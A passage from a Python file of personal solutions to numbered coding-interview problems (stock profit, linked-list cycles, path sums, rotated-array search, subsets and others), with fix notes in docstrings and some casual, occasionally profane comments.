    m2[i] the best within prices[i:].  The answer is max(m1[i] + m2[i]).
    Fix: guard the empty list (the original indexed prices[0] blindly).
    """
    n = len(prices)
    if n == 0:
        return 0
    m1 = [0] * n
    m2 = [0] * n
    max_profit1 = 0
    min_price1 = prices[0]
    max_profit2 = 0
    max_price2 = prices[-1]
    # Forward and backward passes folded into one O(n) loop.
    for i in range(n):
        max_profit1 = max(max_profit1, prices[i] - min_price1)
        m1[i] = max_profit1
        min_price1 = min(min_price1, prices[i])
        max_profit2 = max(max_profit2, max_price2 - prices[n - 1 - i])
        m2[n - 1 - i] = max_profit2
        max_price2 = max(max_price2, prices[n - 1 - i])
    best = 0
    for i in range(n):
        best = max(best, m1[i] + m2[i])
    return best
# 34. Plus One
# Fuck you cheat guys
def plusOne(digits):
    """Increment a number stored as a list of decimal digits, in place.

    Fix: carry now uses floor division (//) so it stays an int on
    Python 3 (s / 10 produced a float carry there).
    """
    i = len(digits) - 1
    carry = 1
    while i >= 0 and carry == 1:  # stop early once the carry dies
        s = digits[i] + carry
        digits[i] = s % 10
        carry = s // 10
        i -= 1
    if carry == 1:  # overflow past the leading digit, e.g. 99 -> 100
        digits.insert(0, 1)
    return digits
# 35. Roatate Image
def rotate_image(matrix):
    """Return a new matrix equal to `matrix` rotated 90 degrees clockwise."""
    rows = len(matrix)
    cols = len(matrix[0])
    # Column j of the input, read bottom-to-top, becomes row j of the output.
    return [[matrix[rows - 1 - i][j] for i in range(rows)] for j in range(cols)]
# Fuck remember this is different from the 150Ti
def link_list_cycle(head):
    """Floyd cycle detection: True iff the list starting at head loops.

    Fix: the fast runner only advanced one node per step, so it stayed
    level with the slow runner and reported a cycle for ANY list of two
    or more nodes.  It must move two steps per iteration.
    """
    slow_runner = head
    fast_runner = head
    while fast_runner is not None and fast_runner.next is not None:
        fast_runner = fast_runner.next.next
        slow_runner = slow_runner.next
        if fast_runner == slow_runner:
            return True
    return False
# 36. Linked List Cycle II
# Remember to set slow = head.next and fast = head.next.next before entering the loop
def link_list_cycle_II(head):
    """Return the node where the cycle begins, or None if acyclic.

    Fix: the original took no parameters and referenced an undefined
    `head` (NameError on every call); `head` is now a parameter.
    """
    if head is None or head.next is None:
        return None
    slow = head.next
    fast = head.next.next
    while slow != fast:
        if fast is None or fast.next is None:
            return None  # fast fell off the end: no cycle
        slow = slow.next
        fast = fast.next.next
    # Restart one runner from head; they meet at the cycle entry.
    fast = head
    while slow != fast:
        slow = slow.next
        fast = fast.next
    return slow
# 37. Unique Path
def unique_path(m, n):
    """Count monotone (down/right) lattice paths to cell (m, n), recursively."""
    if m == 0 and n == 0:
        return 0
    if (m, n) in ((1, 0), (0, 1)):
        return 1
    if m == 0:
        return unique_path(0, n - 1)
    if n == 0:
        return unique_path(m - 1, 0)
    return unique_path(m - 1, n) + unique_path(m, n - 1)
def unique_path_ii(map, m, n):
    """Count obstacle-avoiding monotone paths from (0, 0) to cell (m, n).

    map[r][c] == 1 marks an obstacle.  Fix: one branch recursed through
    the misspelled name `uniqe_path_ii`, raising NameError whenever only
    the upward neighbour was passable.
    """
    if (m, n) == (0, 0):
        return 0
    elif (m, n) in [(1, 0), (0, 1)]:
        return 1
    else:
        if not valid_point(map, m-1, n) and not valid_point(map, m, n-1): # No where to go
            return 0
        elif valid_point(map, m-1, n) and valid_point(map, m, n-1): # Can go both directions
            return unique_path_ii(map, m-1, n) + unique_path_ii(map, m, n-1)
        else: # Can only go one direction
            if valid_point(map, m-1, n):
                return unique_path_ii(map, m-1, n)
            else:
                return unique_path_ii(map, m, n-1)
def valid_point(map, m, n):
    """A cell is usable if it lies inside the grid and is not an obstacle."""
    if m < 0 or n < 0:
        return False
    if map[m][n] == 1:
        return False
    return True
# This solution may look a bit stupid
# 38. Binary Tree Postorder Traversal
# Doing in iterative way
def bt_post_traversal(root):
    """Iterative postorder traversal; returns node values (.val) in order.

    Produces root-right-left with a stack, then reverses it into
    left-right-root.  Assumes root is not None.
    """
    stack = [root]
    output = []
    while len(stack)>0:
        node = stack.pop()
        output.append(node.val)
        if node.left is not None:
            stack.append(node.left)
        if node.right is not None:
            stack.append(node.right)
    return output[::-1]  # reversed root-right-left == postorder
# Doing recursive is trivial
# NOTE: redefines the iterative version above; this one prints node.data
# (Python 2 print statement) instead of returning a list.
def bt_post_traversal(root):
    # Recursive postorder: left subtree, right subtree, then the node itself.
    if root is None:
        return
    bt_post_traversal(root.left)
    bt_post_traversal(root.right)
    print root.data
# Any pre/in/post-order tree traversal are all dfs which use stack
# 39. Binary Tree Level Order Traversal
def levelOrder(root):
    """BFS level-order traversal; returns a list of per-level value lists.

    A None sentinel in the queue marks the end of each level.
    """
    res = []
    if root is None:
        return res
    queue = []
    level = []
    queue.append(root)
    queue.append(None)  # sentinel: end of level 0
    while len(queue)>0:
        node = queue.pop(0)
        if node is None:
            res.append(level[:])
            level = []
            if len(queue)>0:
                # Only re-add the sentinel while nodes remain, or the loop never ends.
                queue.append(None)
        else:
            level.append(node.val)
            if node.left is not None:
                queue.append(node.left)
            if node.right is not None:
                queue.append(node.right)
    return res
"""
The problem here is we want a result in int, but not copy the node
def bt_level_order_traversal(root):
if root is None:
return []
result = [[root]]
current = []
prev = [root,]
while len(prev):
for node in prev:
if node.left is not None:
current.append(node.left)
if node.right is not None:
current.append(node.right)
if len(current) > 0:
result.append(current)
prev = current
current = []
return result
"""
# 40. Container With Most Water
# Thinking this (i, ai) and (i, 0)
# so for pair (m, n)
# area is abs(m-n) * min(am, an)
def most_water(plist):
    """Brute-force max container area over all pairs of (x, height) points.

    Fix: the original computed max(...) but discarded the result, so it
    always returned 0.
    """
    max_volumn = 0
    for i, pm in enumerate(plist):
        for pn in plist[i+1:]:
            max_volumn = max(max_volumn, calculate_area(pm, pn))
    return max_volumn
def calculate_area(pm, pn):
    """Area of the container formed by two (x, height) points."""
    return abs(pm[0] - pn[0]) * min(pm[1], pn[1])
# My algorithm is correct, this use greedy algorithm
def maxArea(height):
    """Greedy two-pointer max container area over vertical lines."""
    left = 0
    right = len(height) - 1
    best = 0
    while left < right:
        width = right - left
        best = max(best, width * min(height[left], height[right]))
        # Moving the shorter side inward is the only way the area can grow.
        if height[left] <= height[right]:
            left += 1
        else:
            right -= 1
    return best
# 41. Minimum Path Sum
# Strong feel that I did correctly, but need to check more. The result on website is almost same with mine
# Online result is doing a map, each point is the sum till current position.
def min_path_sum(grid):
    """Minimum top-left to bottom-right path sum (moves: down/right only).

    Fixes: the original referenced undefined m/n, dropped `grid` from the
    recursive calls, and took min() of two identical subproblems.
    """
    return min_path_helper(grid, len(grid) - 1, len(grid[0]) - 1, 0)
def min_path_helper(grid, m, n, sum):
    """Minimum cost of reaching cell (m, n) from (0, 0), plus offset `sum`."""
    if (m, n) == (0, 0):
        return sum + grid[0][0]
    elif m == 0:  # top row: only leftward moves remain
        return min_path_helper(grid, m, n-1, sum) + grid[m][n]
    elif n == 0:  # left column: only upward moves remain
        return min_path_helper(grid, m-1, n, sum) + grid[m][n]
    else:
        return min(min_path_helper(grid, m-1, n, sum),
                   min_path_helper(grid, m, n-1, sum)) + grid[m][n]
# Above is the recursive way. I think iterative way should be better
def min_path_sum(grid):
    """Iterative DP for minimum top-left to bottom-right path sum.

    Fixes two defects: `[[0]*m]*n` aliased every row to the same list so
    writes to one row clobbered all rows, and the final lookup swapped
    the row/column indices (crashing on non-square grids).
    """
    cols = len(grid[0])
    rows = len(grid)
    t = [[0] * cols for _ in range(rows)]  # independent row objects
    for i in range(rows):
        for j in range(cols):
            if i == 0 and j == 0:
                t[i][j] = grid[i][j]
            elif i == 0:
                t[i][j] = t[i][j-1] + grid[i][j]
            elif j == 0:
                t[i][j] = t[i-1][j] + grid[i][j]
            else:
                t[i][j] = min(t[i-1][j], t[i][j-1]) + grid[i][j]
    return t[rows-1][cols-1]
# 42. Search a 2D Matrix
# !! Remember that binary search is start <= end !!!!
def searchMatrix(matrix, target):
    """Two-stage binary search in a row-sorted matrix whose rows ascend.

    Fixes: the original saved the row index as `col` but then read an
    undefined `row` (NameError), and its `/` divisions produced float
    indices on Python 3.
    """
    top = 0
    bottom = len(matrix) - 1
    while top <= bottom:
        row = (top + bottom) // 2
        if matrix[row][0] <= target <= matrix[row][-1]:
            # Target can only live in this row; binary-search the columns.
            left = 0
            right = len(matrix[row]) - 1
            while left <= right:
                mid = (left + right) // 2
                if matrix[row][mid] == target:
                    return True
                elif target < matrix[row][mid]:
                    right = mid - 1
                else:
                    left = mid + 1
            return False
        elif target < matrix[row][0]:
            bottom = row - 1
        else:
            top = row + 1
    return False
# This is better, nested matrix
"""
Generate m*n matrix
a = 0
m = []
for i in range(10):
row = []
for j in range(8):
row.append(a)
a += 1
m.append(row[:])
"""
"""
def search_2d_matrix(matrix, target):
m = len(matrix[0])
n = len(matrix)
start = 0
end = n - 1
while start < end:
row_mid = (start+end)/2
if matrix[row_mid][0] <= target and matirx[row_mid][-1] >= target: # search for this row
start = 0
end = m-1
while start <= end:
col_mid = (start+end)/2
if matrix[row_mid][col_mid] == target:
return True
elif matrix[row_mid][col_mid] > target: # need to search front half
end = mid -1
else:
start = mid + 1
return False
elif matrix[row_mid][0] > target: # search for front half
end = row_mid - 1
else:
start = row_id + 1
return False
"""
# 43. Set Matrix Zeroes
# There's a better way which can save the space of doing so'
def set_matirx_0(matrix):
    """Zero out every row/column containing a 0, in place, O(1) extra space.

    Row 0 and column 0 double as marker storage; two booleans remember
    whether they themselves contained a zero.
    """
    height = len(matrix)
    width = len(matrix[0])
    first_row_has_zero = False
    first_col_has_zero = False
    for r in range(height):
        for c in range(width):
            if matrix[r][c] != 0:
                continue
            if r == 0:
                first_row_has_zero = True
            if c == 0:
                first_col_has_zero = True
            matrix[r][0] = 0
            matrix[0][c] = 0
    for r in range(1, height):
        for c in range(1, width):
            if matrix[r][0] == 0 or matrix[0][c] == 0:
                matrix[r][c] = 0
    if first_col_has_zero:
        for r in range(height):
            matrix[r][0] = 0
    if first_row_has_zero:
        for c in range(width):
            matrix[0][c] = 0
    return matrix
# 44. Path Sum
# in a pretty good shape
def has_path_sum(root, target):
    """True iff some root-to-leaf path sums to target (node values in .data)."""
    if root is None:
        return False
    elif root.left is None and root.right is None: # Found a leaf
        if target == root.data:
            return True
        else:
            return False
    else:
        target -= root.data  # consume this node's value before recursing
        return has_path_sum(root.left, target) or has_path_sum(root.right, target)
# 45. Remove Duplicates from Sorted Array II
# Note: we have 4 types of questions: Remove dup from sorted array i/ii and list i/ii
def remove_dup_array_II(array):
    """Compact a sorted array, keeping only values that appear exactly once.

    NOTE(review): despite the "II" name this drops every duplicated value
    entirely (list-II semantics, not "keep at most two"); the final
    `current > 1` test returns [] when exactly one element survives, and
    an empty input indexes array[-1] — confirm the intended contract.
    """
    current = 0   # write cursor for kept elements
    counter = 0   # duplicate count for the value ending at index i-1
    n = len(array)
    for i in range(1, n):
        if array[i] == array[i-1]: # Found a dup
            counter += 1
        else:
            if counter > 0:
                pass  # previous value was duplicated: drop it entirely
            else:
                array[current] = array[i-1]
                current += 1
            counter = 0
    if counter == 0:
        array[current] = array[n-1]  # trailing value was unique: keep it
        current += 1
    if current > 1:
        return array[:current]
    else:
        return []
# 46. Spiral Matirx II
def spiral_matrix_II(n):
    """Build an n x n matrix filled 1..n*n in clockwise spiral order."""
    grid = [[0 for _ in range(n)] for _ in range(n)]
    top = left = 0
    bottom = right = n - 1
    value = 1
    while top < bottom and left < right:
        for col in range(left, right + 1):       # top edge, left to right
            grid[top][col] = value
            value += 1
        for row in range(top + 1, bottom + 1):   # right edge, downward
            grid[row][right] = value
            value += 1
        for col in range(right - 1, left - 1, -1):  # bottom edge, right to left
            grid[bottom][col] = value
            value += 1
        for row in range(bottom - 1, top, -1):   # left edge, upward
            grid[row][left] = value
            value += 1
        top += 1
        left += 1
        bottom -= 1
        right -= 1
    if n % 2 == 1:  # odd n leaves a single centre cell unfilled
        grid[top][left] = value
    return grid
# 47. Pascal's Triangle II
def pascal_triangle_II(n):
    """Return row n (0-indexed) of Pascal's triangle as a deque.

    Fix: the original ran only n-1 iterations, so it produced a row with
    n-1 entries (empty for n <= 1) instead of the requested row n with
    n+1 entries.
    """
    from collections import deque
    result = deque()
    for i in range(n + 1):
        # Fold adjacent pairs in place, then prepend the leading 1.
        for j in range(0, len(result) - 1):
            result[j] = result[j] + result[j + 1]
        result.appendleft(1)
    return result
# 48. Combinations
# Remember in this question, result need to use result[:] as copy
# Simpler way
def combine(n, k):
    """All k-element combinations drawn from 1..n, in ascending order."""
    collected = []
    combine_helper(1, n, k, [], collected)
    return collected
def combine_helper(cur, n, k, res, ret):
    """Extend res with values >= cur until it holds k elements."""
    if len(res) == k:
        ret.append(res[:])
        return
    for value in range(cur, n + 1):
        combine_helper(value + 1, n, k, res + [value], ret)
"""
def combine(n, k):
ret = []
def combine_helper(result):
if len(result) == k:
ret.append(result[:])
return
elif len(result) == 0:
start = 1
else:
start = result[-1] + 1
if start > n:
return
else:
for i in range(start, n+1):
result.append(i)
combine_helper(result)
result.pop()
combine_helper([])
print ret
"""
# 49. Search in Rotated Sorted Array II/I
# Don't be afraid of this problem. It's very simple once you know what to do
# This is not correct for array[mid] > array[start]
# Should use array[mid] > array[end] instead
def search_rot_array_i(array, target):
    """Binary search in a rotated sorted array with distinct elements.

    At each step one half is guaranteed sorted; test whether target lies
    inside it.  Fix: `/` is now `//` so mid stays an int on Python 3.
    """
    start = 0
    end = len(array) - 1
    while start <= end:
        mid = (start + end) // 2
        if target == array[mid]:
            return True
        if array[mid] >= array[start]: # First half sorted
            if array[start] <= target and target < array[mid]:
                end = mid - 1
            else:
                start = mid + 1
        else: # Second half sorted
            if array[mid] < target and target <= array[end]:
                start = mid + 1
            else:
                end = mid - 1
    return False
# Introducing the situation that dupliate element, but actually they are same
# When there are dup element, just keep on moving
def search_rot_arrary_II(array, target):
    """Rotated-array search tolerating duplicates (worst case O(n)).

    Fixes: the original declared no parameters (NameError on array and
    target) and used `/`, which yields float indices on Python 3.
    """
    start = 0
    end = len(array) - 1
    while start <= end:
        mid = (start + end) // 2
        if target == array[mid]:
            return True
        if array[mid] > array[start]: # First half sorted
            if array[start] <= target and target < array[mid]:
                end = mid - 1
            else:
                start = mid + 1
        elif array[mid] < array[start]: # Second half sorted
            if array[mid] < target and target <= array[end]:
                start = mid + 1
            else:
                end = mid - 1
        else: # array[mid] == array[start]: can't tell which half; shrink by one
            start += 1
    return False
# 50. Remove Nth Node From End of List
# Too lazy to check if it is correct
def remove_nth_end(head, n):
    """Locate the nth node from the end using two offset runners.

    NOTE(review): despite the name this returns that node's .data and
    never unlinks it; it also returns None when the list is shorter than
    n.  Confirm which behaviour callers expect before relying on it.
    """
    if head is None:
        return
    slow = head
    fast = head
    for i in range(n):  # give fast an n-node head start
        if fast.next is None:
            return
        fast = fast.next
    while fast is not None:  # advance both until fast runs off the end
        fast = fast.next
        slow = slow.next
    return slow.data
# 51. Populate Next Right Pointers in Each Node II
# A bit hard to think, need to slow down
def pop_next_pointers_ii(root):
    """Wire each node's .next to its right neighbour on the same level.

    Handles arbitrary (non-perfect) binary trees: the current level is
    walked via the .next links built on the previous pass while the
    level below is threaded together.
    """
    if root is None:
        return
    head = None  # first node of the level below
    prev = None  # last node threaded on the level below
    while root is not None:
        while root is not None:  # traverse one level left-to-right
            if root.left is not None:
                if prev is None:
                    prev = head = root.left
                else:
                    prev.next = root.left
                    prev = prev.next
            if root.right is not None:
                if prev is None:
                    prev = head = root.right
                else:
                    prev.next = root.right
                    prev = prev.next
            root = root.next
        root = head  # drop to the level just threaded
        prev = None
        head = None
    return
# 52. Palindrome Number
def palindrome(num):
    """True iff the non-negative integer reads the same forwards/backwards.

    Fixes: the divisor loop started at 10 with `> 0`, overshooting by a
    factor of 10 (palindrome(121) returned False), and `/` produced
    floats on Python 3; both replaced with a `>= 10` loop and `//`.
    """
    if num < 0:
        return False
    div = 1
    while num // div >= 10:  # div becomes 10**(digits-1)
        div *= 10
    while num > 0:
        left_bit = num // div
        right_bit = num % 10
        if left_bit != right_bit:
            return False
        # Strip both outer digits, then shrink the divisor accordingly.
        num = (num % div) // 10
        div //= 100
    return True
# 53. Minimum Depth of Binary Tree
def min_depth_of_bt(root):
    """Shortest root-to-leaf node count; a one-child node must recurse
    into its existing child (it is not a leaf)."""
    if root is None:
        return 0
    child_depths = []
    if root.left is not None:
        child_depths.append(min_depth_of_bt(root.left))
    if root.right is not None:
        child_depths.append(min_depth_of_bt(root.right))
    if not child_depths:  # leaf
        return 1
    return min(child_depths) + 1
# 54. Sum Root to Leaf Numbers
def sum_root_to_leaf(root):
    """Sum the decimal numbers spelled by every root-to-leaf path.

    Rewritten: the original mutated a closed-over int (UnboundLocalError
    in Python 2, no nonlocal), recursed into the wrong children
    (node.left guard recursed right, `right is None` guard recursed
    left), double-counted the root, and never returned the result.
    """
    if root is None:
        return 0
    return _sum_root_to_leaf_helper(root, 0)
def _sum_root_to_leaf_helper(node, value):
    """Accumulated value for the path ending at node's subtree."""
    value = value * 10 + node.data
    if node.left is None and node.right is None:
        return value  # leaf: this path contributes its full number
    total = 0
    if node.left is not None:
        total += _sum_root_to_leaf_helper(node.left, value)
    if node.right is not None:
        total += _sum_root_to_leaf_helper(node.right, value)
    return total
# 55. Length of Last Word
# This a python way, even not the python way, it's too easy
def lengthOfLastWord_1(s):
    """Length of the last whitespace-delimited word in s (0 if none)."""
    words = s.split()
    return len(words[-1]) if words else 0
def lengthOfLastWord_2(s): # My way
    """Length of the last word: strip trailing spaces, count from the end."""
    trimmed = s.rstrip(' ')
    count = 0
    for ch in reversed(trimmed):
        if ch == ' ':
            break
        count += 1
    return count
def lengthOfLastWord_3(s): # Annie way
    """Single reverse scan: count word chars, stop at the first space
    after the word has started."""
    size = 0
    for ch in reversed(s):
        if ch != ' ':
            size += 1
        elif size > 0:
            break
    return size
"""
Too Sen Po Ah me
def len_last_word(str):
word_list = str.split(' ')
return len(word_list[-1])
def len_lst_word(str):
if str[-1] == ' ':
return 0
for i, char in enumerate(str[::-1]):
if char == ' ':
return i
"""
# 56. Trapping Rain Water
def trap(A):
    """Total rain water trapped over elevation map A.

    Water at i is bounded by the highest wall on each side:
    min(max_left[i], max_right[i]) - A[i].
    """
    n = len(A)
    if n == 0:
        return 0
    highest_to_left = [0] * n
    highest_to_right = [0] * n
    running = A[0]
    for i in range(n):
        running = max(running, A[i])
        highest_to_left[i] = running
    running = A[-1]
    for i in range(n - 1, -1, -1):
        running = max(running, A[i])
        highest_to_right[i] = running
    total = 0
    for i in range(n):
        total += min(highest_to_left[i], highest_to_right[i]) - A[i]
    return total
# 57. Search in Rotated Sorted Array
# See 49.
# 58. Valid Parenetheses
# Simpler code
def isValid(s):
    """True iff every bracket in s closes the most recent unmatched opener."""
    closer_for = { '[' : ']',
                   '{' : '}',
                   '(' : ')',
                   }
    pending = []
    for ch in s:
        if ch in closer_for:
            pending.append(ch)
        elif not pending or ch != closer_for[pending.pop()]:
            return False
    return len(pending) == 0
"""
# Remember, here cannot use dict() to define '[' as a key
def valid_paren(parens):
pair = { '[' : ']',
'{' : '}',
'(' : ')'}
if parens[0] in [']','}',')']:
return False
stack = []
stack.append(parens[0])
for i in range(1, len(parens)):
if parens[i] in ['[','{','(']:
stack.append(parens[i])
else:
if not stack:
return False
current = stack[-1]
if pair.get(current) != parens[i]:
return False
else:
stack.pop()
if stack:
return False
return True
"""
# 59. Valid Sudoku
def valid_sudoku(board):
    """Validate a 9x9 sudoku board ('.' = empty): no repeated digit in any
    row, column, or 3x3 box.

    Fixes: the box loop used `range(i, +3)` (i.e. range(i, 3)) instead of
    range(i, i+3), and accumulated into an undefined `num` list that was
    never reset per box.
    """
    if len(board) != 9 or len(board[0]) != 9:
        return False
    for i in range(9):
        row = []
        column = []
        for j in range(9):
            if board[i][j] != '.':
                if board[i][j] in row:
                    return False
                row.append(board[i][j])
            if board[j][i] != '.':
                if board[j][i] in column:
                    return False
                column.append(board[j][i])
    for i in range(0, 9, 3):
        for j in range(0, 9, 3):
            seen = []  # fresh per 3x3 box
            for x in range(i, i + 3):
                for y in range(j, j + 3):
                    if board[x][y] == '.':
                        continue
                    if board[x][y] in seen:
                        return False
                    seen.append(board[x][y])
    return True
# 60. Path Sum II
# Should be correct
def path_sum_ii(root, target):
    """All root-to-leaf paths (as value lists) summing exactly to target.

    Rewritten: the original used `paths.append[...]` (indexing, not a
    call), mixed node.value with node.data, pruned on a condition that
    rejected valid paths, and never returned `paths`.
    """
    if root is None:
        return []
    paths = []
    def _walk(node, trail, remaining):
        trail.append(node.data)
        remaining -= node.data
        if node.left is None and node.right is None:
            if remaining == 0:  # leaf consumed the target exactly
                paths.append(trail[:])
        else:
            if node.left is not None:
                _walk(node.left, trail, remaining)
            if node.right is not None:
                _walk(node.right, trail, remaining)
        trail.pop()  # backtrack for the sibling branch
    _walk(root, [], target)
    return paths
# 61. Subsets
def subsets(S):
    """Power set of S; input sorted first so output order is canonical."""
    out = []
    subsets_helper(0, sorted(S), [], out)
    return out
def subsets_helper(i, S, res, ret):
    """Emit every subset of S[i:] appended to res (exclude-branch first)."""
    if i == len(S):
        ret.append(list(res))
        return
    for take in (False, True):
        if take:
            res.append(S[i])
        subsets_helper(i + 1, S, res, ret)
        if take:
            res.pop()
"""
New answer has better understanding
# SOOOOOOO Niu Bi
def sub_sets(list):
ret = [[]]
def sub_sets_helper(result, list):
for i, item in enumerate(list):
result.append(item)
ret.append(result[:])
sub_sets_helper(result, list[i+1:])
result.pop()
sub_sets_helper([], list)
return ret
"""
# 62. Unique Path
# check 37
def unique_path_ii():
    # Placeholder only: the actual implementation lives with problem 37 above.
    pass
# 63. Jump Game
# Better way to do this, think as a dp
def jump_game(jump_list):
    """Greedy reachability: True iff index 0 can reach the last index."""
    last = len(jump_list) - 1
    reach = 0       # furthest index reachable so far
    position = 0
    while position <= reach and reach < last:
        reach = max(reach, position + jump_list[position])
        position += 1
    return reach >= last
# So many boundary problem
def jump_game(jump_list):
    """True iff index 0 can reach the last index: every zero must have an
    earlier cell able to jump past it.

    Fixes: a zero at the LAST index needs no jump over it (original
    rejected e.g. [1, 0]), and the break test used strict `<`, rejecting
    cells whose jump lands exactly one past the zero (e.g. [2, 0, 1]).
    """
    length = len(jump_list)
    for i, height in enumerate(jump_list[::-1]):
        if height == 0 and i > 0:  # i == 0 is the final cell: no jump needed
            require = 1            # jump length needed from `location` to clear the zero
            location = length - i - 1
            while location >= 0:
                if jump_list[location] >= require:
                    break  # this cell can jump past the zero
                require += 1
                location -= 1
            if location < 0:
                return False
    return True
# 64. Flatten Binary Tree to Linked List
# This is different from the web, need to check if this is also correct
def flat_bt(root):
    """Flatten the tree in place into a right-spine list in preorder.

    Rewritten: the original referenced an undefined `head` (NameError)
    and its trailing `root.left is None` lines were comparisons, not
    assignments.  This version uses the Morris-style splice: hang each
    node's right subtree off the rightmost node of its left subtree.
    """
    if root is None:
        return None
    node = root
    while node is not None:
        if node.left is not None:
            rightmost = node.left
            while rightmost.right is not None:
                rightmost = rightmost.right
            rightmost.right = node.right  # splice old right subtree after left's tail
            node.right = node.left
            node.left = None
        node = node.right
# 65. Longest Consecutive Sequence
def longestConsecutive_2(num):
    """Length of the longest run of consecutive integers in num.

    Consumes (removes from) the input list while scanning, matching the
    original's destructive behaviour.
    """
    if len(num) <= 1:
        return len(num)
    best = 1
    for value in num[:]:
        if value not in num:
            continue  # already absorbed into an earlier run
        run = 1
        probe = value
        while probe + 1 in num:  # extend upwards
            run += 1
            num.remove(probe + 1)
            probe += 1
        probe = value
        while probe - 1 in num:  # extend downwards
            run += 1
            num.remove(probe - 1)
            probe -= 1
        best = max(best, run)
        num.remove(value)
    return best
"""
Better way above, not using anything
Also need to remember should use two direction find
def longest_con_seq(list):
from sets import Set
d = Set
longest = 1
for i in list:
if i not in d:
d.add(i)
for item in d:
cur = item
cur_len = 1
while cur+1 in d:
cur_len += 1
cur +=1
longest = max(longest, cur_len)
return longest
"""
# 66. Subsets II
# There's another version of doing subsets. But almost the same.
def sub_sets_ii(list):
    """Power set without duplicate subsets (input assumed sorted)."""
    ret = [[]]
    def grow(prefix, remaining):
        for idx, item in enumerate(remaining):
            prefix.append(item)
            snapshot = prefix[:]
            if snapshot not in ret:  # skip subsets already produced
                ret.append(snapshot)
            grow(prefix, remaining[idx + 1:])
            prefix.pop()
    grow([], list)
    return ret
# 67. Longest Common Prefix
# Tricky is no need to set flag or anything. Just return the result
def longest_common_prefix(list_str):
    """Longest common leading substring of all strings.

    Returns None for an empty list (matching the original), and the sole
    string for a one-element list.
    """
    if len(list_str) == 0:
        return None
    if len(list_str) == 1:
        return list_str[0]
    reference = list_str[0]
    for pos in range(len(reference)):
        for other in list_str[1:]:
            if pos >= len(other) or other[pos] != reference[pos]:
                return reference[:pos]
    return reference
# Use a quick way but not the Big-O best one
def commonprefix(m):
    "Given a list of pathnames, returns the longest common leading component"
    # The lexicographic min and max differ the most; any prefix they share
    # is shared by every string in between.
    # Fix: removed a stray Python 2 `print s1, s2` debug statement that is
    # a SyntaxError under Python 3.
    if not m: return ''
    s1 = min(m)
    s2 = max(m)
    for i, c in enumerate(s1):
        if c != s2[i]:
            return s1[:i]
    return s1
# 68. Search for a Range
# Perfect for one time
def search_for_range(target, list):
    """Return (first, last) indices of target in a sorted list, or (-1, -1).

    Fixes: the original expansion loop walked past both ends of the list
    (negative indices wrap around in Python, then IndexError), and `/`
    gave a float mid on Python 3.
    """
    start = 0
    end = len(list) - 1
    while start <= end:
        mid = (start + end) // 2
        if list[mid] == target:
            lo = hi = mid
            # Expand outwards with explicit bounds checks.
            while lo - 1 >= 0 and list[lo - 1] == target:
                lo -= 1
            while hi + 1 < len(list) and list[hi + 1] == target:
                hi += 1
            return (lo, hi)
        elif list[mid] < target: # need to search second half
            start = mid + 1
        else:
            end = mid - 1
    return (-1, -1)
# 69. 3 Sum Closest
# This time cannot remember it. This is a weird solution. Need to think hard next time.
def three_sum_closest(list, target):
    """Sum of the triple closest to target (sorts the input in place).

    Fix: the original had no inner loop, so for each i it examined only
    the single triple (i, i+1, n-1) and then discarded the adjusted
    pointers; the standard two-pointer scan is restored.
    """
    list.sort()
    n = len(list)
    res = list[0] + list[1] + list[2]
    for i in range(n - 2):
        start = i + 1
        end = n - 1
        while start < end:
            sum = list[i] + list[start] + list[end]
            if abs(sum - target) < abs(res - target):
                res = sum
            if sum == target:
                return sum  # can't do better than exact
            elif sum < target:
                start += 1
            else:
                end -= 1
    return res
# 70. Convert Sorted List to Binary Search Tree
# A bit tricky when need to check head == slow
def convert_to_bst(head):
    """Build a height-balanced BST from a sorted linked list.

    Finds the middle with slow/fast runners, makes it the root, severs
    the list around it, and recurses on both halves.  `Node` is the
    project's tree-node type (data/left/right).
    """
    if head is None:
        return None
    slow = head
    fast = head
    prev = None  # node just before the middle, used to cut the left half
    while fast.next is not None and fast.next.next is not None:
        prev = slow
        fast = fast.next.next
        slow = slow.next # slow is what we are looking for
    if head == slow:
        head = None  # single-node list: no left sublist remains
    # Create two separate linklists
    if prev is not None:
        prev.next = None
    node = Node(slow.data)
    node.left = convert_to_bst(head)
    node.right = convert_to_bst(slow.next)
    return node
# 71. Count and Say
# Will use the num as itself here. So easy
def count_n_say(string):
    """Describe runs in `string` as "<count> <char>", pluralising counts
    greater than one with an 's' (e.g. "aab" -> "2 as 1 b")."""
    pieces = []
    run_char = string[0]
    run_len = 1
    for ch in string[1:]:
        if ch == run_char:
            run_len += 1
            continue
        # Run ended: flush it with the plural/singular separator.
        pieces.append(str(run_len) + ' ' + run_char + ('s ' if run_len > 1 else ' '))
        run_char = ch
        run_len = 1
    final = str(run_len) + ' ' + run_char
    if run_len > 1:
        final += 's'
    pieces.append(final)
    return ''.join(pieces)
# 72. Triangle
# way to thinking is too diao
def triangle(triangle):
    """Minimum top-to-bottom path sum; folds rows upward in place so the
    apex ends up holding the answer."""
    if triangle is None:
        return 0
    row = len(triangle) - 2
    while row >= 0:
        for col in range(len(triangle[row])):
            # Each cell absorbs its cheaper child from the row below.
            triangle[row][col] += min(triangle[row + 1][col], triangle[row + 1][col + 1])
        row -= 1
    return triangle[0][0]
# 73. Unique Binary Search
# Remember it's multiply but not plus
# Wrong one, this is unique bst i, but not ii
def unique_bs(list):
    """Count structurally unique BSTs over the ordered values in list
    (the Catalan numbers).

    Fix: the base case returned len(list) for len <= 2, so the empty
    sublist contributed a factor of 0 and every input of 3+ elements
    counted as 0.  An empty subtree is ONE shape, not zero.
    """
    if len(list) <= 1:
        return 1  # empty tree or single node: exactly one shape
    result = 0
    for i in range(len(list)):
        # Element i as root: independent choices for left and right.
        result += unique_bs(list[:i]) * unique_bs(list[i+1:])
    return result
# Need to write this again
def unique_bs_ii(n):
    """Build every structurally unique BST holding the values 1..n."""
    a = range(1, n + 1)
    return unique_bs_ii_helper(a)
def unique_bs_ii_helper(a):
    """Return a list of root nodes of all BSTs over the ordered values a."""
    if not a:
        return [None]  # exactly one way to build an empty subtree
    else:
        res = []
        for i, c in enumerate(a):
            # c becomes the root; split values feed the two subtrees.
            left = unique_bs_ii_helper(a[:i])
            right = unique_bs_ii_helper(a[i + 1:])
            for l in left:
                for r in right:
                    root = TreeNode(c)  # TreeNode comes from the project
                    root.left = l
                    root.right = r
                    res.append(root)
        return res
# 74. Binary Tree Zigzag Level Order Traversal
def zizag_traversal(root):
    """Levels of tree NODES, alternating left-to-right and right-to-left.

    Rewritten: the original was a SyntaxError (missing colon on the
    outer while), called deque(root) on a single node, and never rebuilt
    `current` between levels.
    """
    if root is None:
        return []
    result = []
    level = [root]
    reversed_level = False  # level 0 reads left-to-right
    while len(level) > 0:
        if reversed_level:
            result.append(level[::-1])
